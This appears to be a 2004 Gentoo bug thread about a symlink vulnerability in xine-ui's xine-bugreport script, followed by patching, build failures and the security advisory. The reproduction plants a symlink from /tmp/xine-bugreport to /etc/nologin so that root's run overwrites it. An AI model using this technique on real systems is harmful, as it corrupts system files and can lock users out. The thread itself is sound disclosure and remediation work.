Read the URL for details (http://nettwerked.mg2.org/advisories/xinebug). This got posted on bugtraq Saturday, 20/03/2004.

Reproducible: Always

Steps to Reproduce:
In the section of the xine-bugreport/xine-check script which assembles a bug report email, a symlink vulnerability exists due to an insecure file write of the finished bug report email template. This may allow an attacker to write to/corrupt sensitive system files, and in theory elevate privileges, although unlikely.

Actual Results:
Exploitation
#############

Below is an example exploitation scenario which I actually carried out on my system.

--- attack ---

[shaun@localhost shaun]$ ls -al /etc/nologin
ls: /etc/nologin: No such file or directory
[shaun@localhost shaun]$ ln -s /etc/nologin /tmp/xine-bugreport

[...]

[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
You should definitely run xine as normal user, not root. Running it as root will expose you to some severe security issues. This script should run as the same user that you would use to run xine. If you run me as root (as you currently are), I cannot check if your real-life user has sufficient permissions... Unless you want to recheck something with root permissions, you should abort me now (press Ctrl-C) and run me from your usual account.
press <enter> to continue...
[ good ] you're using Linux, doing specific tests
[ good ] looks like you have a /proc filesystem mounted.
[ good ] You seem to have a reasonable kernel version (2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR support
[ good ] you have MTRR support and there are some ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
The xine-config script can be used to deternime some file locations used by xine-lib, but you don't have such a script on your system. However, it looks like you installed xine from the RedHat packages. So I'll just guess that you are using the standard locations. If you want me to be sure about those file locations, you can install the 'xine-lib-devel' package (or 'xine-devel', depend on what packages you're using, which contains xine-config. However, this package is not really needed to run xine...
press <enter> to continue...
[ good ] plugin directory /usr/lib/xine/plugins exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
/dev/dvd is the default device that xine uses for playing DVDs. You could make your life easier by creating a symlink named /dev/dvd pointing to your DVD device (something like /dev/scd0 or /dev/hdc). If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus),
rm /dev/dvd
ln -s hdb /dev/dvd
typed as root will give you the symlink. Alternatively, you can configure xine to use the real device directly, using the setup dialog within xine, but I can't check your DMA settings in that case...
press <enter> to continue...
[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/
press <enter> to continue...
[ hint ] Your X server doesn't support packed YUV overlays.
That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/
press <enter> to continue...
[ hint ] Your X server doesn't have any XVideo support...
XVideo is an X server extension introduced by XFree86 4.x. This extension provides access to hardware accelerated color space conversion and scaling, which gives a great performance boost. If you have a fast (>1GHz) machine, you may be able to watch all kinds of video, anyway. You will waste lots of CPU cycles, though...
press <enter> to continue...
Could you solve your xine problems using the previous hints? (y/n)? '
pardon?? neither yes nor no? assuming no...
What kind of trouble does xine cause for you?
1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else

[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
You should definitely run xine as normal user, not root. Running it as root will expose you to some severe security issues. This script should run as the same user that you would use to run xine. If you run me as root (as you currently are), I cannot check if your real-life user has sufficient permissions... Unless you want to recheck something with root permissions, you should abort me now (press Ctrl-C) and run me from your usual account.
press <enter> to continue...
[ good ] you're using Linux, doing specific tests
[ good ] looks like you have a /proc filesystem mounted.
[ good ] You seem to have a reasonable kernel version (2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR support
[ good ] you have MTRR support and there are some ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
The xine-config script can be used to deternime some file locations used by xine-lib, but you don't have such a script on your system. However, it looks like you installed xine from the RedHat packages. So I'll just guess that you are using the standard locations. If you want me to be sure about those file locations, you can install the 'xine-lib-devel' package (or 'xine-devel', depend on what packages you're using, which contains xine-config. However, this package is not really needed to run xine...
press <enter> to continue...
[ good ] plugin directory /usr/lib/xine/plugins exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
/dev/dvd is the default device that xine uses for playing DVDs. You could make your life easier by creating a symlink named /dev/dvd pointing to your DVD device (something like /dev/scd0 or /dev/hdc). If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus),
rm /dev/dvd
ln -s hdb /dev/dvd
typed as root will give you the symlink. Alternatively, you can configure xine to use the real device directly, using the setup dialog within xine, but I can't check your DMA settings in that case...
press <enter> to continue...
[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/
press <enter> to continue...
[ hint ] Your X server doesn't support packed YUV overlays.
That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive. Maybe upgrading your X server will help here. If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/
press <enter> to continue...
[ hint ] Your X server doesn't have any XVideo support...
XVideo is an X server extension introduced by XFree86 4.x. This extension provides access to hardware accelerated color space conversion and scaling, which gives a great performance boost. If you have a fast (>1GHz) machine, you may be able to watch all kinds of video, anyway. You will waste lots of CPU cycles, though...
press <enter> to continue...
Could you solve your xine problems using the previous hints? (y/n)? n
What kind of trouble does xine cause for you?
1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else
please select (1..8): 8
please describe your xine problem briefly in _one_ line ( < 65 characters): hello world
You should include a _complete_ copy of xine's output in your bug report. Note, however, that there is a 40K limit on messages sent to the mailing list, So you should strip down the parts that repeat over and over, if there are any.
You can either copy&paste this output from the terminal where you ran xine, or you can collect xine's output in a file named /tmp/xine.out, using this command:
xine >/tmp/xine.out 2>&1
(assuming you have a Bourne compatible shell, like bash, for example)
If you need to add any parameters, you can do so... This method is useful if you want to remove part of the output...
Which method would you prefer?
1) copy&paste
2) logfile /tmp/xine.out
please select (1..2): 2
please press <return> when you have the log ready in /tmp/xine.out
Hmmm, I could not read the /tmp/xine.out file. Skipping this step. You may add the output later, if this wasn't your intention...
press <enter> to continue...
Okay. That's all I could guide you through...
I have assembled a skeleton for your bugreport in the file /tmp/xine-bugreport
You're strongly encouraged to add a detailed description of your problem. Just look for 'additional description', and fill it in...
When you're finished, you can use your favourite mailer to send it to <xine-user@lists.sf.net>. Please use this subject line, or something similar:
Subject: bug: hello world
Alternatively, I could try to send the bug report for you, using
/bin/mail -s "bug: hello world"
Please make sure to add the additional description before saying "yes"!
Do you want me to do this now? (y/n)? n
Thanks for your bugreport! Have a nice day!

[...]

[shaun@localhost shaun]$ ls -al /etc/nologin
-rw-r--r-- 1 root root 1756 Mar 20 21:56 /etc/nologin
[shaun@localhost shaun]$
I can confirm this with xine-ui 0.9.23, but for some reason I can't get to the Xine website to see if an updated version has been released.
Mhmm, I just looked at the xine website. The latest version is 1-rc3b, therefore there is apparently no fixed version available. There is now an entry in bugtraq's vulnerability db: http://www.securityfocus.com/bid/9939/info/ Except for a list of vulnerable versions it doesn't seem to contain anything new.
I'm going to sleep now.. hopefully by the time I wake up one of you will have attached a patch (hint, hint)
No patch I see.. Ok how about this.. I assume this is a shell script.. with some blatant reference to /tmp.. If this is the case (shell script) could somebody please upload it so that a patch may be created.

------------------------------------------------------------------

BTW: In the future please don't open a bug with the status of GLSA. The product goes to GLSA after the bug is done being worked on in the portage system. Thanks.
Created attachment 28126: add symlink checks to xine-check (& xine-bugreport)

This should stop xine-check/xine-bugreport blindly writing into symlinks for the logfile, tmpfile or bugreport.
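An added illustration for the report in comment 0 and the patch above; this is not xine-ui code and not attachment 28126. It shows in POSIX sh why a fixed report path written with `>` follows a planted symlink, and two ways a script can avoid it; the sandbox directory, the stand-in target file and the function names are constructed for the example.

```shell
#!/bin/sh
# Added example for this bug; not xine-ui code and not the attachment 28126 patch.
# Shows why a fixed /tmp path written with '>' follows a planted symlink, and
# two ways a script can avoid that. Names and the sandbox are constructed.

# Naive write: '>' opens with O_CREAT|O_TRUNC and follows any symlink at $1.
write_report_naive() {
    printf 'bug: %s\n' "$2" > "$1"
}

# Hardened write 1: with noclobber the shell refuses an existing regular file
# and, when the path does not resolve, creates with O_CREAT|O_EXCL, which
# open(2) rejects for a symlink even if it dangles. Check and create are one step.
write_report_excl() {
    ( set -C; printf 'bug: %s\n' "$2" > "$1" ) 2>/dev/null
}

# Hardened write 2: let mktemp create a fresh 0600 file under an
# unpredictable name inside directory $1 and print that name for the user.
write_report_mktemp() {
    f=$(mktemp "$1/xine-bugreport.XXXXXX") || return 1
    printf 'bug: %s\n' "$2" > "$f" && printf '%s\n' "$f"
}

# Demo in a private sandbox: "target" stands in for the file a symlink at the
# report path could point at. Prints three flags: naive write followed the
# link, noclobber write refused it, mktemp write produced a real file.
demo() {
    sandbox=$(mktemp -d) || return 1
    target="$sandbox/target"
    link="$sandbox/xine-bugreport"
    ln -s "$target" "$link"

    write_report_naive "$link" "hello world"
    naive_followed=0
    [ -e "$target" ] && naive_followed=1
    rm -f "$target"

    excl_refused=0
    write_report_excl "$link" "hello world" || excl_refused=1
    [ -e "$target" ] && excl_refused=0

    report=$(write_report_mktemp "$sandbox" "hello world")
    mktemp_ok=0
    [ -f "$report" ] && [ ! -L "$report" ] && mktemp_ok=1

    rm -rf "$sandbox"
    echo "$naive_followed $excl_refused $mktemp_ok"
}
```

Running `demo` prints `1 1 1`: only the naive write lands in the symlink's target, while both hardened variants leave it untouched.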
Reassigning correct Product/component as the bug has not been worked out yet. -K
media-video herd -- can you review/comment and apply the patch if appropriate?
Working on it... looks like I'm the only cowboy for this herd right now. Not a good state, if you have a look at the bug list :-(
Ok, all versions in CVS now are patched. Go ahead.
Patrick: Your commit doesn't show up on CVSweb : http://www.gentoo.org/cgi-bin/viewcvs.cgi/media-video/xine-ui/?hideattic=1#dirlist Or do I have sync problems, or am I looking in the wrong package ? Thanks for your work, media-video is a large herd to watch all alone :) -K
OK I'm out of sync :)

Ready for a GLSA :
x86 should upgrade to xine-ui-0.9.21-r1
ppc should upgrade to xine-ui-0.9.13-r1
um .. build for xine-ui-0.9.23-r1 crashes and burns on the introduction of the patch.

emerge fragment...

make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/desktops'
Making all in visuals
make[3]: Entering directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/visuals'
make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/visuals'
make[3]: Entering directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
test `cd .; pwd` = `pwd` || cp ./xine-check.sh.in .
perl ./build-xine-check.pl ./xine-check.en
chmod a+x xine-check
ln -s xine-check xine-bugreport
ln: `xine-bugreport': File exists
make[3]: *** [xine-bugreport] Error 1
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23'
make: *** [all] Error 2

!!! ERROR: media-video/xine-ui-0.9.23-r1 failed.
!!! Function src_compile, Line 43, Exitcode 2
!!! (no error message)

attempt to symlink finds a real file already there .. previous version (without -r1) installed fine
*** Bug 47737 has been marked as a duplicate of this bug. ***
sorry guys, there's something wrong with this patch.
Hmm... going back to wait_for_ebuild phosphan: your opinion on the problem ? Someone with powers should remove the offending ebuild ?
i've also created a bug upstream http://sourceforge.net/tracker/index.php?func=detail&aid=934417&group_id=9655&atid=109655
A minor subtlety .. my previous xine-ui-0.9.23.ebuild with the true-false patch added installed fine.. Apparently some changes had occurred since I last installed (had to use the ebuild copy out of /var/db in order to test). So some thing in the symlink patch is causing the file xine-bugreport to exist too soon perhaps? It is created seemingly before xine-check according to the time stamps ..
i've just commited a fix. please test and report
*** Bug 47749 has been marked as a duplicate of this bug. ***
nope at this time it still does the same thing (ebuild time stamp 12:37 now instead of 6:33).. perhaps using a "ln -sf" would work but I don't know how to add that.. nothing seems to have changed (except a few quotes removed).. comparing the ebuilds .. perhaps it has not yet hit the mirrors??
emerge -pu world broke on xine-ui install. Come on guys, get it together. This shouldn't be happening on the stable branch. Just so I don't sound like a total ass: Gentoo is great, and so are the people who help make it happen. Except for the odd time. :o).
*** Bug 47748 has been marked as a duplicate of this bug. ***
it compiles here on both of my dev boxes
okay I can make it compile and install using the ebuild commands .. provided I clobber xine-bugreport .. ""after unpack" or rather after a failed emerge" and before compile, install and qmerge..
okay add the line rm misc/xine-bugreport as the first line inside the Braces of the src_compile routine in the ebuild and it all works ..
The src_compile alteration cured the problem for me.
*** Bug 47794 has been marked as a duplicate of this bug. ***
ack! what a pain this was... the misc/xine-bugreport is a symlink created by the makefile. This file should not have appeared in the .22 tarball. The symlink-patch tried patching both these original files. So, on .23 which properly did NOT have the -bugreport file, the patch added it before the build. So the same problem reappeared. It was a moving target. Fixing one broke the other. Both versions listed below should work, and should have this security patch properly applied. 0.9.22-r2 (x86) and 0.9.23-r1 (~x86)
um .. the line rm misc/xine-bugreport is still needed for xine-ui-0.9.23-r1 to build completely .. something about the patching process is still creating a real xine-bugreport file before the symlinking happens so it chokes if the file is not clobbered.. derk
please clean your PORTAGE_TMPDIR="/var/tmp" and try again
sorry still chokes after that. note I also tried removing the actual patching of xine-bugreport from the patch file also trying to apply the patch to only xine-check or xine-check.sh.in but any patching still results in the creation of xine-bugreport in some fashion probably by the makefile config processes. Probably any kind of date stamp alteration (atime, mtime) is setting it off.
*** Bug 47811 has been marked as a duplicate of this bug. ***
xine-ui-0.9.23-r1.ebuild,v 1.3 cvs header fixes all issues time to send out GLSA
Had this problem on two separate computers. Both fixed by using the suggestion here: http://bugs.gentoo.org/show_bug.cgi?id=45448#c25
*** Bug 47841 has been marked as a duplicate of this bug. ***
Sorry for causing so much trouble, should've checked the side effects more thoroughly.
Two new vulnerabilities in xine-ui (#48108) and xine-lib (#48107) have just been submitted. A global GLSA will be published when all xine-* vulns are fixed.
xine-ui-0.9.23-r2 includes the patch from #48108.
GLSA 200404-20.